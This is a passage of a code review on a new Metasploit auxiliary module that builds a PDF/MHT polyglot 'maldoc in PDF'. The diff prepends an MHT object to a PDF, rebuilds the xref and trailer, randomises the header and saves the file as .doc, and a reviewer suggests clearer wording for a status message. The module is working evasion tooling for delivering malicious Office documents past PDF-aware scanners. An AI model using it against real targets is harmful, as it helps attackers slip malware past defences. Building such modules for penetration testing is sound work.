modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb

```diff
@@ -0,0 +1,232 @@
+    # read PDF in binary mode
+    pdf_data = File.binread(pdf_path)
+    vprint_status("PDF data length: #{pdf_data.length}")
+
+    # find the position of 'startxref'
+    startxref_index = pdf_data.rindex('startxref')
+    unless startxref_index
+      fail_with(Failure::Unknown, 'Invalid PDF: \'startxref\' not found')
+    end
+
+    xref_start_value = pdf_data[startxref_index..].match(/startxref\r?\n(\d+)/)[1].to_i
+    vprint_status("PDF startxref value: #{xref_start_value}")
+    vprint_status("PDF startxref position: #{startxref_index}")
+
+    # extract the original objects
+    original_objects = pdf_data[0...startxref_index]
+
+    # build the MHT object as the first object (0 0 obj)
+    mht_object = ''
+    mht_object << "0 0 obj\r\n"
+    mht_object << "<< /Length #{mht.length} >>\r\n"
+    mht_object << "stream\r\n"
+    mht_object << mht
+    mht_object << "\r\nendstream\r\n"
+    mht_object << "endobj\r\n"
+
+    # combine: MHT first, then original items
+    updated_objects = mht_object + original_objects
+
+    # calculate offsets for XREF section
+    offsets = []
+    updated_objects.scan(/(\d+) 0 obj/) do |match|
+      offsets << updated_objects.index("#{match[0]} 0 obj")
+    end
+
+    # build the XREF section
+    xref = "xref\r\n"
+    # includes free entry (0) and items
+    xref << "0 #{offsets.size + 1}\r\n"
+    # free entry
+    xref << "0000000000 65535 f\r\n"
+    offsets.each do |offset|
+      xref << format("%010d 00000 n\r\n", offset)
+    end
+
+    # build the trailer
+    xref_start_new = updated_objects.length
+    trailer = "trailer\r\n"
+    trailer << "<< /Size #{offsets.size + 1} /Root 1 0 R >>\r\n"
+    trailer << "startxref\r\n"
+    trailer << "#{xref_start_new}\r\n"
+    trailer << "%%EOF\r\n"
+
+    # assemble the final PDF
+    headers = "#{rand_pdfheader}\r\n"
+    pdf = headers + updated_objects + xref + trailer
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def rand_pdfheader
+    # List of recognized PDF versions
+    pdf_versions = [
+      '1.0', '1.1', '1.2', '1.3', '1.4', '1.5', '1.6', '1.7', '2.0'
+    ]
+    # random verion selection
+    selected_version = pdf_versions.sample
+
+    "%PDF-#{selected_version}"
+  end
+
+  def run
+    if datastore['FILENAME'].nil? || datastore['FILENAME'].empty?
+      fail_with(Failure::BadConfig, 'No FILENAME provided')
+    end
+
+    content = File.read(datastore['FILENAME'])
+    if content.nil? || content.empty?
+      fail_with(Failure::BadConfig, 'The MHT file content is empty')
+    end
+
+    # if no pdf injected is provided, create new PDF from template
+    if datastore['INJECTED_PDF'].nil? || datastore['INJECTED_PDF'].empty?
+      print_status('PDF creation using local template')
```

Comment:
```suggestion
    if datastore['INJECTED_PDF'].nil? || datastore['INJECTED_PDF'].empty?
      print_status('INJECTED_PDF not provided, creating the PDF from scratch')
```

"local template" is a bit confusing I think